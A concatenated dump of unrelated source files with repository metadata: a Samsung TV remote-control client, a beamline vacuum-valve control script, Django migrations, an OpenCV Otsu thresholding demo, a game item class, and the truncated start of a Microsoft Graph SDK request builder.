_WS_ENDPOINT_REMOTE_CONTROL = "/api/v2/channels/samsung.remote.control"
_WS_ENDPOINT_APP_CONTROL = "/api/v2"
_WS_ENDPOINT_ART = "/api/v2/channels/com.samsung.art-app"
_REST_URL_FORMAT = "http://{host}:8001/api/v2/{append}"
def __init__(
self,
host,
token=None,
token_file=None,
port=8001,
timeout=None,
key_press_delay=1,
name="SamsungTvRemote",
app_list=None,
):
self.host = host
self.token = token
self.token_file = token_file
self.port = port
self.timeout = None if timeout == 0 else timeout
self.key_press_delay = key_press_delay
self.name = name
self.connection = None
self._app_list = app_list
self._artmode_status = ArtModeStatus.Unsupported
self._power_on_requested = False
self._power_on_requested_time = datetime.min
self._installed_app = {}
self._running_app = None
self._app_type = {}
self._sync_lock = Lock()
self._last_app_scan = datetime.min
self._last_ping = datetime.min
self._is_connected = False
self._ws_remote = None
self._client_remote = None
self._ws_control = None
self._client_control = None
self._ws_art = None
self._client_art = None
self._client_art_supported = 2
self._ping = Ping(self.host, 1)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _serialize_string(self, string):
if isinstance(string, str):
string = str.encode(string)
return base64.b64encode(string).decode("utf-8")
def _is_ssl_connection(self):
return self.port == 8002
def _format_websocket_url(self, path, is_ssl=False, use_token=True):
scheme = "wss" if is_ssl else "ws"
if is_ssl and use_token:
token = self._get_token()
else:
token = ""
new_uri = URL.build(
scheme=scheme,
host=self.host,
port=self.port,
path=path,
query={"name": self._serialize_string(self.name)}
)
if token:
return str(new_uri.update_query({"token": token}))
return str(new_uri)
def _format_rest_url(self, append=""):
params = {
"host": self.host,
"append": append,
}
return self._REST_URL_FORMAT.format(**params)
def _get_token(self):
if self.token_file is not None:
try:
with open(self.token_file, "r") as token_file:
return token_file.readline()
except:
return ""
else:
return self.token
def _set_token(self, token):
_LOGGING.info("New token %s", token)
if self.token_file is not None:
_LOGGING.debug("Save token to file", token)
with open(self.token_file, "w") as token_file:
token_file.write(token)
else:
self.token = token
def _ws_send(self, command, key_press_delay=None, *, use_control=False, ws_socket=None):
using_remote = False
if not use_control:
if self._ws_remote:
connection = self._ws_remote
using_remote = True
else:
connection = self.open()
elif ws_socket:
connection = ws_socket
else:
return
payload = json.dumps(command)
connection.send(payload)
if using_remote:
# we consider a message sent valid as a ping
self._last_ping = datetime.now()
if key_press_delay is None:
time.sleep(self.key_press_delay)
elif key_press_delay > 0:
time.sleep(key_press_delay)
def _rest_request(self, target, method="GET"):
url = self._format_rest_url(target)
try:
if method == "POST":
return requests.post(url, timeout=self.timeout)
elif method == "PUT":
return requests.put(url, timeout=self.timeout)
elif method == "DELETE":
return requests.delete(url, timeout=self.timeout)
else:
return requests.get(url, timeout=self.timeout)
except requests.ConnectionError:
raise exceptions.HttpApiError(
"TV unreachable or feature not supported on this model."
)
def _process_api_response(self, response):
try:
return json.loads(response)
except json.JSONDecodeError:
_LOGGING.debug(
"Failed to parse response from TV. response text: %s", response
)
raise exceptions.ResponseError(
"Failed to parse response from TV. Maybe feature not supported on this model"
)
def _client_remote_thread(self):
if self._ws_remote:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_REMOTE_CONTROL,
is_ssl=is_ssl
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_remote = websocket.WebSocketApp(
url,
on_message=self._on_message_remote,
on_ping=self._on_ping_remote,
)
_LOGGING.debug("Thread SamsungRemote started")
# we set ping interval (1 hour) only to enable multi-threading mode
# on socket. TV do not answer to ping but send ping to client
self._ws_remote.run_forever(
sslopt=sslopt, ping_interval=3600, ping_timeout=2
)
self._is_connected = False
if self._ws_art:
self._ws_art.close()
if self._ws_control:
self._ws_control.close()
self._ws_remote.close()
self._ws_remote = None
_LOGGING.debug("Thread SamsungRemote terminated")
def _on_ping_remote(self, payload):
_LOGGING.debug("Received ping %s, sending pong", payload)
self._last_ping = datetime.now()
if self._ws_remote.sock:
try:
self._ws_remote.sock.pong(payload)
except Exception as ex:
_LOGGING.warning("send_pong failed: {}".format(ex))
def _on_message_remote(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
event = response.get("event")
if not event:
return
# we consider a message valid as a ping
self._last_ping = datetime.now()
if event == "ms.channel.connect":
_LOGGING.debug("Message remote: received connect")
if response.get("data") and response.get("data").get("token"):
token = response.get("data").get("token")
_LOGGING.debug("Got token %s", token)
self._set_token(token)
self._is_connected = True
self._request_apps_list()
self.start_client(start_all=True)
elif event == "ed.installedApp.get":
_LOGGING.debug("Message remote: received installedApp")
self._handle_installed_app(response)
# self.start_client(start_all=True)
elif event == "ed.edenTV.update":
_LOGGING.debug("Message remote: received edenTV")
self.get_running_app(force_scan=True)
def _request_apps_list(self):
_LOGGING.debug("Request app list")
self._ws_send(
{
"method": "ms.channel.emit",
"params": {"event": "ed.installedApp.get", "to": "host"},
},
key_press_delay=0,
)
def _handle_installed_app(self, response):
list_app = response.get("data", {}).get("data")
installed_app = {}
for app_info in list_app:
app_id = app_info["appId"]
_LOGGING.debug("Found app: %s", app_id)
app = App(app_id, app_info["name"], app_info["app_type"])
installed_app[app_id] = app
self._installed_app = installed_app
def _client_control_thread(self):
if self._ws_control:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_APP_CONTROL,
is_ssl=is_ssl,
use_token=False
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_control = websocket.WebSocketApp(
url,
on_message=self._on_message_control,
)
_LOGGING.debug("Thread SamsungControl started")
self._ws_control.run_forever(sslopt=sslopt)
self._ws_control.close()
self._ws_control = None
_LOGGING.debug("Thread SamsungControl terminated")
def _on_message_control(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
result = response.get("result")
if result:
self._set_running_app(response)
return
error = response.get("error")
if error:
self._manage_control_err(response)
return
event = response.get("event")
if not event:
return
if event == "ms.channel.connect":
_LOGGING.debug("Message control: received connect")
self.get_running_app()
def _set_running_app(self, response):
app_id = response.get("id")
if not app_id:
return
result = response.get("result")
if result is None:
return
elif isinstance(result, bool):
is_running = result
else:
is_running = result.get("visible")
if is_running is None:
return
if self._running_app:
if is_running and app_id != self._running_app:
_LOGGING.debug("app running: %s", app_id)
self._running_app = app_id
elif not is_running and app_id == self._running_app:
_LOGGING.debug("app stopped: %s", app_id)
self._running_app = None
elif is_running:
_LOGGING.debug("app running: %s", app_id)
self._running_app = app_id
def _manage_control_err(self, response):
app_id = response.get("id")
if not app_id:
return
error_code = response.get("error", {}).get("code", 0)
if error_code == 404: # Not found error
if self._installed_app:
if app_id not in self._installed_app:
_LOGGING.error("App ID %s not found", app_id)
return
# app_type = self._app_type.get(app_id)
# if app_type is None:
# _LOGGING.info(
# "App ID %s with type DEEP_LINK not found, set as NATIVE_LAUNCH",
# app_id,
# )
# self._app_type[app_id] = 4
def _get_app_status(self, app_id, app_type):
_LOGGING.debug("Get app status: AppID: %s, AppType: %s", app_id, app_type)
# if app_type == 4:
# method = "ms.webapplication.get"
# else:
# method = "ms.application.get"
if app_type == 4: # app type 4 always return not found error
return
method = "ms.application.get"
self._ws_send(
{
"id": app_id,
"method": method,
"params": {"id": app_id},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_control,
)
def _client_art_thread(self):
if self._ws_art:
return
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_ART,
is_ssl=is_ssl,
use_token=False
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
self._ws_art = websocket.WebSocketApp(
url,
on_message=self._on_message_art,
)
_LOGGING.debug("Thread SamsungArt started")
self._ws_art.run_forever(sslopt=sslopt)
self._ws_art.close()
self._ws_art = None
_LOGGING.debug("Thread SamsungArt terminated")
def _on_message_art(self, message):
response = self._process_api_response(message)
_LOGGING.debug(response)
event = response.get("event")
if not event:
return
if event == "ms.channel.connect":
_LOGGING.debug("Message art: received connect")
self._client_art_supported = 1
elif event == "ms.channel.ready":
_LOGGING.debug("Message art: channel ready")
self._get_artmode_status()
elif event == "d2d_service_message":
_LOGGING.debug("Message art: d2d message")
self._handle_artmode_status(response)
def _get_artmode_status(self):
_LOGGING.debug("Sending get_art_status")
msg_data = {
"request": "get_artmode_status",
"id": gen_uuid(),
}
self._ws_send(
{
"method": "ms.channel.emit",
"params": {
"data": json.dumps(msg_data),
"to": "host",
"event": "art_app_request",
},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_art,
)
def _handle_artmode_status(self, response):
data_str = response.get("data")
if not data_str:
return
data = self._process_api_response(data_str)
event = data.get("event", "")
if event == "art_mode_changed":
status = data.get("status", "")
if status == "on":
artmode_status = ArtModeStatus.On
else:
artmode_status = ArtModeStatus.Off
elif event == "artmode_status":
value = data.get("value", "")
if value == "on":
artmode_status = ArtModeStatus.On
else:
artmode_status = ArtModeStatus.Off
elif event == "go_to_standby":
artmode_status = ArtModeStatus.Unavailable
elif event == "wakeup":
self._get_artmode_status()
return
else:
# Unknown message
return
if self._power_on_requested and artmode_status != ArtModeStatus.Unavailable:
if artmode_status == ArtModeStatus.On:
self.send_key("KEY_POWER", key_press_delay=0)
self._power_on_requested = False
self._artmode_status = artmode_status
@property
def is_connected(self):
return self._is_connected
@property
def artmode_status(self):
return self._artmode_status
@property
def installed_app(self):
return self._installed_app
@property
def running_app(self):
return self._running_app
def ping_device(self):
result = self._ping.ping()
# check ws ping/pong
call_time = datetime.now()
if result and self._ws_remote:
difference = (call_time - self._last_ping).total_seconds()
result = difference < MAX_WS_PING_INTERVAL
if not result:
self.stop_client()
if self._artmode_status != ArtModeStatus.Unsupported:
self._artmode_status = ArtModeStatus.Unavailable
if self._power_on_requested:
difference = (call_time - self._power_on_requested_time).total_seconds()
if difference > 20:
self._power_on_requested = False
return result
def set_power_on_request(self):
self._power_on_requested = True
self._power_on_requested_time = datetime.now()
def get_running_app(self, *, force_scan=False):
if not self._ws_control:
return
with self._sync_lock:
call_time = datetime.now()
difference = (call_time - self._last_app_scan).total_seconds()
if (difference < MIN_APP_SCAN_INTERVAL and not force_scan) or difference < 1:
return
self._last_app_scan = call_time
if self._app_list is not None:
app_to_check = {}
for app_name, app_id in self._app_list.items():
app = None
if self._installed_app:
app = self._installed_app.get(app_id)
else:
app_type = self._app_type.get(app_id, 2)
if app_type <= 4:
app = App(app_id, app_name, app_type)
if app:
app_to_check[app_id] = app
else:
app_to_check = self._installed_app
for app in app_to_check.values():
self._get_app_status(app.app_id, app.app_type)
def start_client(self, *, start_all=False):
"""Start all thread that connect to the TV websocket"""
if self._client_remote is None or not self._client_remote.is_alive():
self._client_remote = Thread(target=self._client_remote_thread)
self._client_remote.name = "SamsungRemote"
self._client_remote.setDaemon(True)
self._client_remote.start()
if start_all:
if self._client_control is None or not self._client_control.is_alive():
self._client_control = Thread(target=self._client_control_thread)
self._client_control.name = "SamsungControl"
self._client_control.setDaemon(True)
self._client_control.start()
if (
self._client_art_supported > 0 and
(self._client_art is None or not self._client_art.is_alive())
):
if self._client_art_supported > 1:
self._client_art_supported = 0
self._client_art = Thread(target=self._client_art_thread)
self._client_art.name = "SamsungArt"
self._client_art.setDaemon(True)
self._client_art.start()
def stop_client(self):
if self._ws_remote:
self._ws_remote.close()
def open(self):
if self.connection is not None:
return self.connection
is_ssl = self._is_ssl_connection()
url = self._format_websocket_url(
self._WS_ENDPOINT_REMOTE_CONTROL,
is_ssl=is_ssl
)
sslopt = {"cert_reqs": ssl.CERT_NONE} if is_ssl else {}
_LOGGING.debug("WS url %s", url)
connection = websocket.create_connection(url, self.timeout, sslopt=sslopt)
response = self._process_api_response(connection.recv())
if response["event"] == "ms.channel.connect":
if response.get("data") and response.get("data").get("token"):
token = response.get("data").get("token")
_LOGGING.debug("Got token %s", token)
self._set_token(token)
else:
self.close()
raise exceptions.ConnectionFailure(response)
self.connection = connection
return connection
def close(self):
if self.connection:
self.connection.close()
self.connection = None
_LOGGING.debug("Connection closed.")
def send_key(self, key, key_press_delay=None, cmd="Click"):
_LOGGING.debug("Sending key %s", key)
self._ws_send(
{
"method": "ms.remote.control",
"params": {
"Cmd": cmd,
"DataOfCmd": key,
"Option": "false",
"TypeOfRemote": "SendRemoteKey",
},
},
key_press_delay,
)
def hold_key(self, key, seconds):
self.send_key(key, key_press_delay=0, cmd="Press")
time.sleep(seconds)
self.send_key(key, key_press_delay=0, cmd="Release")
def move_cursor(self, x, y, duration=0):
self._ws_send(
{
"method": "ms.remote.control",
"params": {
"Cmd": "Move",
"Position": {"x": x, "y": y, "Time": str(duration)},
"TypeOfRemote": "ProcessMouseDevice",
},
},
key_press_delay=0,
)
def run_app(self, app_id, action_type="", meta_tag="", *, use_remote=False):
if not action_type:
app = self._installed_app.get(app_id)
if app:
app_type = app.app_type
else:
app_type = self._app_type.get(app_id, 2)
action_type = TYPE_DEEP_LINK if app_type == 2 else TYPE_NATIVE_LAUNCH
elif action_type != TYPE_NATIVE_LAUNCH:
action_type = TYPE_DEEP_LINK
_LOGGING.debug(
"Sending run app app_id: %s app_type: %s meta_tag: %s",
app_id,
action_type,
meta_tag,
)
if self._ws_control and action_type == TYPE_DEEP_LINK and not use_remote:
self._ws_send(
{
"id": app_id,
"method": "ms.application.start",
"params": {"id": app_id},
},
key_press_delay=0,
use_control=True,
ws_socket=self._ws_control,
)
return
self._ws_send(
{
"method": "ms.channel.emit",
"params": {
"event": "ed.apps.launch",
"to": "host",
"data": {
# action_type: NATIVE_LAUNCH / DEEP_LINK
# app_type == 2 ? 'DEEP_LINK' : 'NATIVE_LAUNCH',
"action_type": action_type,
"appId": app_id,
"metaTag": meta_tag,
},
},
},
key_press_delay=0,
)
def open_browser(self, url):
_LOGGING.debug("Opening url in browser %s", url)
self.run_app("org.tizen.browser", TYPE_NATIVE_LAUNCH, url)
def rest_device_info(self):
_LOGGING.debug("Get device info via rest api")
response = self._rest_request("")
return self._process_api_response(response.text)
def rest_app_status(self, app_id):
_LOGGING.debug("Get app %s status via rest api", app_id)
response = self._rest_request("applications/" + app_id)
return self._process_api_response(response.text)
def rest_app_run(self, app_id):
_LOGGING.debug("Run app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "POST")
return self._process_api_response(response.text)
def rest_app_close(self, app_id):
_LOGGING.debug("Close app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "DELETE")
return self._process_api_response(response.text)
def rest_app_install(self, app_id):
_LOGGING.debug("Install app %s via rest api", app_id)
response = self._rest_request("applications/" + app_id, "PUT")
return self._process_api_response(response.text)
def shortcuts(self):
return shortcuts.SamsungTVShortcuts(self)
|
[
"eric@plante.ca"
] |
eric@plante.ca
|
09c006664cf108d6ae9fc0f41fcb8e22fcea4877
|
a9e60d0e5b3b5062a81da96be2d9c748a96ffca7
|
/configurations/i21-config/scripts/functions/sample_vessel_vacuum_control.py
|
055be6350f0c567e280cfe42194b79f557165ef8
|
[] |
no_license
|
openGDA/gda-diamond
|
3736718596f47607335ada470d06148d7b57526e
|
bbb64dcfd581c30eddb210c647db5b5864b59166
|
refs/heads/master
| 2023-08-16T08:01:11.075927
| 2023-08-15T16:01:52
| 2023-08-15T16:01:52
| 121,757,699
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,543
|
py
|
'''
define function to control the sample vessel vacuum valves for sample changes
Created on 18 Jul 2023
@author: fy65
'''
import installation
from gda.device.scannable import ScannableMotionBase
from gda.epics import CAClient
# control PV = BL21I-EA-SMPL-01:SEQ:CTRL
# state PV = BL21I-EA-SMPL-01:SEQ:CTRL:STATE_RBV
class SampleVesselValvesControl(ScannableMotionBase):
def __init__(self, name, pv):
self.setName(name)
self.setInputNames([name])
self.setOutputFormat(["%d"])
self.control = CAClient(pv)
self.state = CAClient(pv + ":STATE_RBV")
self.control.configure()
self.state.configure()
self.val = 0
def getPosition(self):
if installation.isLive():
return int(self.control.get()) #0 - Close, 1 - Open
if installation.isDummy():
return self.val
def asynchronousMoveTo(self, val):
if installation.isLive():
self.control.caput(int(val))
if installation.isDummy():
self.val = val
if val == 1:
print("Open sample vessel valves")
if val == 0:
print("Close sample vessel valves")
def isBusy(self):
if installation.isLive():
return int(self.state.caget()) != 2 #2 - Ready, 1 - Opening, 0 - Closing
if installation.isDummy():
return False
sample_vessel_valves = SampleVesselValvesControl("sample_vessel_valves", "BL21I-EA-SMPL-01:SEQ:CTRL")
|
[
"fajin.yuan@diamond.ac.uk"
] |
fajin.yuan@diamond.ac.uk
|
1ca54c25efd9250bdc727477130bd4e28d32ef07
|
c6f063e2f6ab9aed7743255b8c4b131a3638dd30
|
/env1/lib/python3.9/site-packages/webpush/migrations/0003_auto_20211108_1056.py
|
22febc2a8208476cc38e6b2d934e7872117439d3
|
[] |
no_license
|
Muthoniyahya/agricoope
|
31d94ee02e0e5cc650afc251104c6fe4a91cb1b9
|
c1ef91866b4646a19825a6d833f78868663d61d1
|
refs/heads/master
| 2023-09-02T21:33:41.991628
| 2021-11-18T23:22:27
| 2021-11-18T23:22:27
| 429,600,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 881
|
py
|
# Generated by Django 3.2.8 on 2021-11-08 10:56
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('webpush', '0002_auto_20190603_0005'),
]
operations = [
migrations.AlterField(
model_name='group',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='pushinformation',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='subscriptioninfo',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
|
[
"Muthoniyahya@gmail.com"
] |
Muthoniyahya@gmail.com
|
25511219866cbb40fbd6b80bfdc1df6200549f29
|
db46e847a9e382bcc7e062cfbac52fbac0cea490
|
/Bolum1/otsu1.py
|
ef7e7265b90e4fec9241caa5466f6d9d53430f01
|
[] |
no_license
|
pnarbedir/ImageProcessing
|
137ecb3a027afbb41573466415e570055ac00ad5
|
94f4778e773c1ffdda398e6da3824267b7c68651
|
refs/heads/master
| 2023-05-02T13:10:15.254882
| 2021-05-16T00:28:42
| 2021-05-16T00:28:42
| 363,901,232
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 440
|
py
|
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('original.jfif',0)
ret,th1 = cv2.threshold(img,127,255,cv2.THRESH_BINARY)
ret,th2 = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
blur = cv2.GaussianBlur(img,(5,5),0)
ret,th3 = cv2.threshold(blur,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
cv2.imshow('orj',img)
cv2.imshow('th1',th1)
cv2.imshow('th2',th2)
cv2.imshow('th3',th3)
cv2.waitKey()
|
[
"pnarbedir98@gmail.com"
] |
pnarbedir98@gmail.com
|
6346038aeef107d5a4c7721f2a780ff4708abbcc
|
f5b2ee7b630385a8173326aede9b3c43794c4b3e
|
/server/world/item.py
|
5720951d7a49726ebb51efe2d3f6063c6f5e02af
|
[] |
no_license
|
dslice25/tinymmo-server
|
3a324c38475b64220cf6a6bde6ee1277a9bf259b
|
2d01212a8ce6ba9ecc87e2fcf2a3c4979255e926
|
refs/heads/master
| 2021-01-23T10:07:33.355822
| 2017-12-08T21:02:06
| 2017-12-08T21:02:06
| 102,606,582
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,571
|
py
|
import ConfigParser
import uuid
class Item:
index = 0
config = ConfigParser.RawConfigParser()
config.read('server_data/items.ini')
def getid(self):
Item.index += 1
return Item.index
def __init__(self, name, player, container, equipped, world):
#self.name = "%s-%s" % (name, self.getid())
self.name = str(uuid.uuid4())
self.player = player
self.container = container
self.equipped = equipped
self.world = world
self.title = Item.config.get(name, 'title')
self.gear_type = Item.config.get(name, 'gear_type')
self.slot = Item.config.get(name, 'slot')
self.hit = Item.config.getint(name, 'hit')
self.dam = Item.config.getint(name, 'dam')
self.arm = Item.config.getint(name, 'arm')
self.spi = Item.config.getint(name, 'spi')
self.hp = Item.config.getint(name, 'hp')
self.mp = Item.config.getint(name, 'mp')
self.speed = Item.config.getfloat(name, 'speed')
self.icon = Item.config.get(name,'icon')
self.value = Item.config.getint(name, 'value')
self.consumeable = Item.config.getboolean(name, 'consumeable')
self.world.items[self.name] = self
def state(self):
return { 'title': self.title, 'name': self.name, 'slot': self.slot, 'equipped': self.equipped, 'gear_type': self.gear_type, 'icon': self.icon, 'hit': self.hit, 'dam': self.dam, 'arm': self.arm, 'spi': self.spi, 'speed': self.speed, 'value': self.value, 'hp': self.hp, 'mp': self.mp, 'consumeable': self.consumeable }
|
[
"dablum@mit.edu"
] |
dablum@mit.edu
|
b393a423256aa0f889b3a2d9a5f23682e1c3053d
|
31136f3b2aa9ff7166f771a7f4e1da8dd1764b2e
|
/website/events/migrations/0005_auto_20190715_1440.py
|
ec4ca8cd745c5758545e2f31f6086ffdfe7a64c0
|
[
"MIT"
] |
permissive
|
PyAr/asoc_members
|
202bb05f6c58644f5edb19c80a7276b493d3c76b
|
ed3944acadd7d08e53acd6edb5961a4248ea4782
|
refs/heads/master
| 2023-04-15T07:41:45.725797
| 2023-04-11T15:13:24
| 2023-04-11T15:13:24
| 131,543,379
| 10
| 26
|
MIT
| 2023-08-22T22:41:12
| 2018-04-30T01:10:30
|
Python
|
UTF-8
|
Python
| false
| false
| 7,405
|
py
|
# Generated by Django 2.0.4 on 2019-07-15 14:40
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
import events.helpers.models
import events.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('events', '0004_auto_20190618_1853'),
]
operations = [
migrations.CreateModel(
name='Expense',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('description', models.CharField(blank=True, default='', help_text='Descripción del gasto', max_length=317, verbose_name='descripción')),
('amount', models.DecimalField(decimal_places=2, max_digits=18, verbose_name='monto')),
('invoice_type', models.CharField(choices=[('A', 'Factura A'), ('B', 'Factura B'), ('C', 'Factura C'), ('Tic', 'Ticket'), ('Otr', 'Otro')], max_length=5, verbose_name='tipo factura')),
('invoice_date', models.DateField(verbose_name='fecha factura')),
('invoice', models.FileField(upload_to=events.models.expense_upload_path, verbose_name='factura')),
('category', models.CharField(choices=[('Prv', 'Gasto proveedor'), ('Ref', 'Reintegro organizador')], max_length=5, verbose_name='tipo gasto')),
],
options={
'permissions': (('view_expenses', 'puede ver gastos'),),
},
bases=(events.helpers.models.SaveReversionMixin, models.Model),
),
migrations.CreateModel(
name='Payment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('document', models.FileField(upload_to='media/events/payments/', verbose_name='comprobante')),
('changed_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_payment_changed_by', to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_payment_created_by', to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
bases=(events.helpers.models.SaveReversionMixin, models.Model),
),
migrations.CreateModel(
name='Provider',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('document_number', models.CharField(help_text='CUIT del propietario de la cuenta, formato ##-########-#', max_length=13, unique=True, validators=[django.core.validators.RegexValidator('^(20|23|24|27|30|33|34)-[0-9]{8}-[0-9]$', 'El CUIT ingresado no es correcto.')], verbose_name='CUIT')),
('bank_entity', models.CharField(help_text='Nombre de la entiedad bancaria.', max_length=317, verbose_name='entidad bancaria')),
('account_number', models.CharField(help_text='Número de cuenta.', max_length=13, verbose_name='número de cuenta')),
('account_type', models.CharField(choices=[('CC', 'Cuenta corriente'), ('CA', 'Caja de ahorros')], max_length=3, verbose_name='Tipo cuenta')),
('organization_name', models.CharField(help_text='Razón social o nombre del propietario de la cuenta.', max_length=317, verbose_name='razón social')),
('cbu', models.CharField(help_text='CBU de la cuenta', max_length=317, verbose_name='CBU')),
('changed_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_provider_changed_by', to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_provider_created_by', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ['-created'],
'permissions': (('view_providers', 'puede ver proveedores'),),
},
bases=(events.helpers.models.SaveReversionMixin, models.Model),
),
migrations.CreateModel(
name='OrganizerRefund',
fields=[
('expense_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='events.Expense')),
('organizer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='refunds', to='events.Organizer', verbose_name='Organizador')),
('payment', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='events.Payment', verbose_name='pago')),
],
options={
'abstract': False,
},
bases=('events.expense',),
),
migrations.CreateModel(
name='ProviderExpense',
fields=[
('expense_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='events.Expense')),
('payment', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='events.Payment', verbose_name='pago')),
('provider', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expenses', to='events.Provider', verbose_name='Proveedor')),
],
options={
'abstract': False,
},
bases=('events.expense',),
),
migrations.AddField(
model_name='expense',
name='changed_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_expense_changed_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='expense',
name='created_by',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='events_expense_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='expense',
name='event',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='expenses', to='events.Event', verbose_name='Evento'),
),
]
|
[
"andres.ramirez.miori@gmail.com"
] |
andres.ramirez.miori@gmail.com
|
2f9db9f890c9233e5af1669088468a7683d1af35
|
0fb3b73f8e6bb9e931afe4dcfd5cdf4ba888d664
|
/awssam/fullfeblog/blog/migrations/0002_auto_20201208_1414.py
|
b61387acb7dcbe792fb0d7d8887e97d528f46789
|
[] |
no_license
|
mrpal39/ev_code
|
6c56b1a4412503604260b3346a04ef53a2ba8bf2
|
ffa0cf482fa8604b2121957b7b1d68ba63b89522
|
refs/heads/master
| 2023-03-24T03:43:56.778039
| 2021-03-08T17:48:39
| 2021-03-08T17:48:39
| 345,743,264
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,023
|
py
|
# Generated by Django 3.1.4 on 2020-12-08 14:14
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('blog', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='post',
options={'ordering': ('-publish',)},
),
migrations.RenameField(
model_name='post',
old_name='content',
new_name='body',
),
migrations.RenameField(
model_name='post',
old_name='date_posted',
new_name='publish',
),
migrations.AddField(
model_name='post',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='slug',
field=models.SlugField(default=django.utils.timezone.now, max_length=250, unique_for_date='publish'),
preserve_default=False,
),
migrations.AddField(
model_name='post',
name='status',
field=models.CharField(choices=[('draft', 'Draft'), ('published', 'Published')], default='draft', max_length=10),
),
migrations.AddField(
model_name='post',
name='updated',
field=models.DateTimeField(auto_now=True),
),
migrations.AlterField(
model_name='post',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='blog_posts', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='title',
field=models.CharField(max_length=250),
),
]
|
[
"rp9545416@gmail.com"
] |
rp9545416@gmail.com
|
af9bf83cfaf55cd781211bfc9927638d904f30f8
|
975b2d421d3661e6770b601929d5f11d981d8985
|
/msgraph/generated/sites/item/term_stores/item/groups/item/sets/item/children/item/children/item/relations/item/set/set_request_builder.py
|
8ad5043efe01acfd37aa331d26266f34c018c4b3
|
[
"MIT"
] |
permissive
|
microsoftgraph/msgraph-sdk-python
|
a7c551b85daadeebf76ec4ae12668664ea639b42
|
27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949
|
refs/heads/main
| 2023-09-03T21:45:27.989672
| 2023-08-31T06:22:18
| 2023-08-31T06:22:18
| 534,665,999
| 135
| 18
|
MIT
| 2023-09-14T11:04:11
| 2022-09-09T14:00:17
|
Python
|
UTF-8
|
Python
| false
| false
| 4,960
|
py
|
from __future__ import annotations
from dataclasses import dataclass, field
from kiota_abstractions.base_request_builder import BaseRequestBuilder
